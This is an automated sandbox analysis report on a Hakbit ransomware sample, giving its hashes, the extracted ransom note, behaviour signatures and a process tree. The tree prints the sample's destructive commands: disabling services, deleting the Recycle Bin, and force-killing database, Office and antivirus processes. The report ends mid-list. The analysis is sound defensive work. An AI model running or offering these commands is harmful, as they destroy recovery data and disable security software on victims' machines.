hakbit | 69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b

Resubmissions

11-09-2022 15:45

220911-s66x8sffap 10

21-10-2020 17:56

201021-l4bghzn2b2 10

Analysis

max time kernel
122s
max time network
128s
platform
windows7_x64
resource
win7
submitted
21-10-2020 17:56

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
Size

80KB
MD5

8152a3d0d76f7e968597f4f834fdfa9d
SHA1

c3cf05f3f79851d3c0d4266ab77c8e3e3f88c73e
SHA256

69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b
SHA512

eb1a18cb03131466a4152fa2f6874b70c760317148684ca9b95044e50dc9cd19316d6e68e680ce18599114ba73e75264de5dab5afe611165b9c6c0b5f01002b4

Score

10^/10

hakbit ransomware spyware

Malware Config

Extracted

Path

C:\Users\Admin\Desktop\HOW_TO_DECYPHER_FILES.txt

Family

hakbit

Ransom Note

To recover your data contact the email below [email protected] Key Identifier: M13QXKon7C2hkmKC2rgNCHGj5mjFsrhjl+ySO6RMmlJPOxmPQlUIJq2A78fYplgtNaKD0yMxcUuZ4Xhc6NjsXaRiUda+D9j2akL4mdsBmcdpDY/oBfmrGkd/F7D2XYLWs+BrcrGuTNuJkT2MrA9ClBuFN+Qn4imadXWf83wdDThSgRupEt8+3no5Q04HrGM1psRfpqWz1LLmjSKkSojdEtcwpmMul1OTxbtGcy2kVFcnk8+J6bflIhtnwJiauBC0+N7hmGE22aR24kFhZLzlU7e07AwuMa0LBp8Rm+XqLJD/01WUAYDTjv4L+6rmFPXyQx5dl+DE6eJ0yYbH0V5ufZ11q/Ifol3niHIo2ZtDJTdMpPlyH9no4/GU2Yf90GPSozBVGh3c5W4PR3AwMjWXKfX1Zh8acH6BeVJHVbiXLznCsGZNo5PVCkEVH64d39d3HEzN3mA6WUipKiA0dbTxyIyw+gf5hBScbsidlnxhCu9GS95p6hmdR1t8Lskc3vUP1zgrq+G89FCqvipwMN1MiABUhTHyMLvkl3HfmL7EutwJX8JnJPJqnI98nFG1rNx9dIe8Xo1MaiAmq0j61XJTpOe42Ll7+Ui+LooUHbMbpBJ/BUBaaRkdHZId+52teVRQ9wHoLtis+ZqcLt9u4U2GQJHQam7O/N99JxI0quEElNc= Number of files that were processed is: 406

Emails

[email protected]

Signatures

Hakbit
Ransomware which encrypts files using AES, first seen in November 2019.
ransomware hakbit

Modifies extensions of user files 1 IoCs

Ransomware generally changes the extension on encrypted files.

ransomware

description	ioc	Process
File opened for modification	C:\Users\Admin\Pictures\GrantRestore.tiff	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe

Deletes itself 1 IoCs

pid	Process
1856	cmd.exe

Drops startup file 1 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mystartup.lnk	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware

Data from Local System
T1005

Credentials in Files
T1081
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Kills process with taskkill 47 IoCs

evasion

pid	Process
2536	taskkill.exe
2564	taskkill.exe
1800	taskkill.exe
1272	taskkill.exe
672	taskkill.exe
1820	taskkill.exe
1564	taskkill.exe
2216	taskkill.exe
396	taskkill.exe
2124	taskkill.exe
2248	taskkill.exe
2612	taskkill.exe
828	taskkill.exe
2164	taskkill.exe
2200	taskkill.exe
2424	taskkill.exe
2672	taskkill.exe
1804	taskkill.exe
2084	taskkill.exe
1928	taskkill.exe
1980	taskkill.exe
856	taskkill.exe
1688	taskkill.exe
624	taskkill.exe
1084	taskkill.exe
2496	taskkill.exe
2264	taskkill.exe
2468	taskkill.exe
1660	taskkill.exe
1668	taskkill.exe
2040	taskkill.exe
1420	taskkill.exe
112	taskkill.exe
2052	taskkill.exe
2520	taskkill.exe
2364	taskkill.exe
2636	taskkill.exe
1916	taskkill.exe
2016	taskkill.exe
968	taskkill.exe
2288	taskkill.exe
2340	taskkill.exe
2392	taskkill.exe
1552	taskkill.exe
1572	taskkill.exe
1408	taskkill.exe
2588	taskkill.exe

Opens file in notepad (likely ransom note) 1 IoCs

ransomware

pid	Process
1372	notepad.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
2632	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
316	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
316	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
316	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
316	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
316	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
316	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
316	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
316	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
316	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
316	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
316	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
316	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
316	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
316	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
316	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
316	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
316	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
316	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
316	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
316	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
316	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
316	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
316	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
316	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
316	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
316	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
316	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
316	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
316	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
316	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
316	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
316	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
316	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
316	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
316	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
316	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
316	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
316	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
316	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
316	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
316	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
316	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
316	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
316	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
316	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
316	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
316	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
316	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
316	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
316	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
316	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
316	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
316	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
316	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
316	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
316	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
316	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
316	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
316	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
316	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
316	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
316	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
316	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
316	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe

Suspicious use of AdjustPrivilegeToken 48 IoCs

description	pid	Process
Token: SeDebugPrivilege	316	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
Token: SeDebugPrivilege	1660	taskkill.exe
Token: SeDebugPrivilege	828	taskkill.exe
Token: SeDebugPrivilege	1980	taskkill.exe
Token: SeDebugPrivilege	1800	taskkill.exe
Token: SeDebugPrivilege	1272	taskkill.exe
Token: SeDebugPrivilege	2040	taskkill.exe
Token: SeDebugPrivilege	856	taskkill.exe
Token: SeDebugPrivilege	1408	taskkill.exe
Token: SeDebugPrivilege	2084	taskkill.exe
Token: SeDebugPrivilege	1916	taskkill.exe
Token: SeDebugPrivilege	1420	taskkill.exe
Token: SeDebugPrivilege	1688	taskkill.exe
Token: SeDebugPrivilege	2264	taskkill.exe
Token: SeDebugPrivilege	2520	taskkill.exe
Token: SeDebugPrivilege	1668	taskkill.exe
Token: SeDebugPrivilege	2288	taskkill.exe
Token: SeDebugPrivilege	1804	taskkill.exe
Token: SeDebugPrivilege	2364	taskkill.exe
Token: SeDebugPrivilege	396	taskkill.exe
Token: SeDebugPrivilege	2564	taskkill.exe
Token: SeDebugPrivilege	2536	taskkill.exe
Token: SeDebugPrivilege	2392	taskkill.exe
Token: SeDebugPrivilege	2340	taskkill.exe
Token: SeDebugPrivilege	1564	taskkill.exe
Token: SeDebugPrivilege	2164	taskkill.exe
Token: SeDebugPrivilege	672	taskkill.exe
Token: SeDebugPrivilege	2496	taskkill.exe
Token: SeDebugPrivilege	112	taskkill.exe
Token: SeDebugPrivilege	2052	taskkill.exe
Token: SeDebugPrivilege	2672	taskkill.exe
Token: SeDebugPrivilege	1820	taskkill.exe
Token: SeDebugPrivilege	2696	powershell.exe
Token: SeDebugPrivilege	1084	taskkill.exe
Token: SeDebugPrivilege	2612	taskkill.exe
Token: SeDebugPrivilege	2424	taskkill.exe
Token: SeDebugPrivilege	2016	taskkill.exe
Token: SeDebugPrivilege	2636	taskkill.exe
Token: SeDebugPrivilege	2124	taskkill.exe
Token: SeDebugPrivilege	2216	taskkill.exe
Token: SeDebugPrivilege	1572	taskkill.exe
Token: SeDebugPrivilege	2588	taskkill.exe
Token: SeDebugPrivilege	1928	taskkill.exe
Token: SeDebugPrivilege	968	taskkill.exe
Token: SeDebugPrivilege	1552	taskkill.exe
Token: SeDebugPrivilege	2248	taskkill.exe
Token: SeDebugPrivilege	2200	taskkill.exe
Token: SeDebugPrivilege	2468	taskkill.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
316	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe

Suspicious use of SendNotifyMessage 1 IoCs

pid	Process
316	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 316 wrote to memory of 1852	316	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	25
PID 316 wrote to memory of 1852	316	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	25
PID 316 wrote to memory of 1852	316	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	25
PID 316 wrote to memory of 1872	316	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	27
PID 316 wrote to memory of 1872	316	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	27
PID 316 wrote to memory of 1872	316	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	27
PID 316 wrote to memory of 1888	316	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	28
PID 316 wrote to memory of 1888	316	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	28
PID 316 wrote to memory of 1888	316	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	28
PID 316 wrote to memory of 1212	316	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	30
PID 316 wrote to memory of 1212	316	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	30
PID 316 wrote to memory of 1212	316	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	30
PID 316 wrote to memory of 1876	316	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	32
PID 316 wrote to memory of 1876	316	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	32
PID 316 wrote to memory of 1876	316	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	32
PID 316 wrote to memory of 1800	316	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	34
PID 316 wrote to memory of 1800	316	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	34
PID 316 wrote to memory of 1800	316	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	34
PID 316 wrote to memory of 1660	316	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	35
PID 316 wrote to memory of 1660	316	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	35
PID 316 wrote to memory of 1660	316	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	35
PID 316 wrote to memory of 1668	316	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	38
PID 316 wrote to memory of 1668	316	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	38
PID 316 wrote to memory of 1668	316	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	38
PID 316 wrote to memory of 1552	316	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	39
PID 316 wrote to memory of 1552	316	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	39
PID 316 wrote to memory of 1552	316	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	39
PID 316 wrote to memory of 1572	316	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	40
PID 316 wrote to memory of 1572	316	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	40
PID 316 wrote to memory of 1572	316	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	40
PID 316 wrote to memory of 1916	316	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	43
PID 316 wrote to memory of 1916	316	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	43
PID 316 wrote to memory of 1916	316	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	43
PID 316 wrote to memory of 1928	316	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	44
PID 316 wrote to memory of 1928	316	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	44
PID 316 wrote to memory of 1928	316	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	44
PID 316 wrote to memory of 2016	316	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	48
PID 316 wrote to memory of 2016	316	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	48
PID 316 wrote to memory of 2016	316	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	48
PID 316 wrote to memory of 1980	316	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	49
PID 316 wrote to memory of 1980	316	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	49
PID 316 wrote to memory of 1980	316	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	49
PID 316 wrote to memory of 828	316	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	51
PID 316 wrote to memory of 828	316	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	51
PID 316 wrote to memory of 828	316	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	51
PID 316 wrote to memory of 1272	316	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	53
PID 316 wrote to memory of 1272	316	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	53
PID 316 wrote to memory of 1272	316	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	53
PID 316 wrote to memory of 856	316	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	55
PID 316 wrote to memory of 856	316	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	55
PID 316 wrote to memory of 856	316	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	55
PID 316 wrote to memory of 2040	316	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	57
PID 316 wrote to memory of 2040	316	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	57
PID 316 wrote to memory of 2040	316	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	57
PID 316 wrote to memory of 1408	316	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	59
PID 316 wrote to memory of 1408	316	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	59
PID 316 wrote to memory of 1408	316	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	59
PID 316 wrote to memory of 968	316	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	62
PID 316 wrote to memory of 968	316	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	62
PID 316 wrote to memory of 968	316	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	62
PID 316 wrote to memory of 672	316	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	63
PID 316 wrote to memory of 672	316	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	63
PID 316 wrote to memory of 672	316	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	63
PID 316 wrote to memory of 1688	316	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	65

C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
"C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe"
1⤵
- Modifies extensions of user files
- Drops startup file
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:316
- C:\Windows\system32\sc.exe
  "sc.exe" config SQLTELEMETRY start= disabled
  2⤵
  PID:1852
- C:\Windows\system32\sc.exe
  "sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled
  2⤵
  PID:1872
- C:\Windows\system32\sc.exe
  "sc.exe" config SQLWriter start= disabled
  2⤵
  PID:1888
- C:\Windows\system32\sc.exe
  "sc.exe" config SstpSvc start= disabled
  2⤵
  PID:1212
- C:\Windows\system32\cmd.exe
  "cmd.exe" /c rd /s /q %SYSTEMDRIVE%\$Recycle.bin
  2⤵
  PID:1876
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM mspub.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1800
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM mydesktopqos.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1660
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM mydesktopservice.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1668
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM mysqld.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1552
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM sqbcoreservice.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1572
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM firefoxconfig.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1916
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM agntsvc.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1928
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM thebat.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2016
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM steam.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1980
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM encsvc.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:828
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM excel.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1272
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM CNTAoSMgr.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:856
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM sqlwriter.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2040
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM tbirdconfig.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1408
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM dbeng50.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:968
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM thebat64.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:672
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM ocomm.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1688
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM infopath.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1420
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM mbamtray.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:396
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM zoolz.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:112
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" IM thunderbird.exe /F
  2⤵
  - Kills process with taskkill
  PID:624
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM dbsnmp.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1820
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM xfssvccon.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1084
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM mspub.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1564
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM Ntrtscan.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1804
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM isqlplussvc.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2052
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM onenote.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2084
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM PccNTMon.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2124
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM msaccess.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2164
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM outlook.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2200
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM tmlisten.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2216
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM msftesql.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2248
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM powerpnt.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2264
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM mydesktopqos.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2288
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM visio.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2340
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM mydesktopservice.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2364
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM winword.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2392
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM mysqld-nt.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2424
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM wordpad.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2468
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM mysqld-opt.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2496
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM ocautoupds.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2520
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM ocssd.exe /F
  2⤵
  - Kills process with taskkill
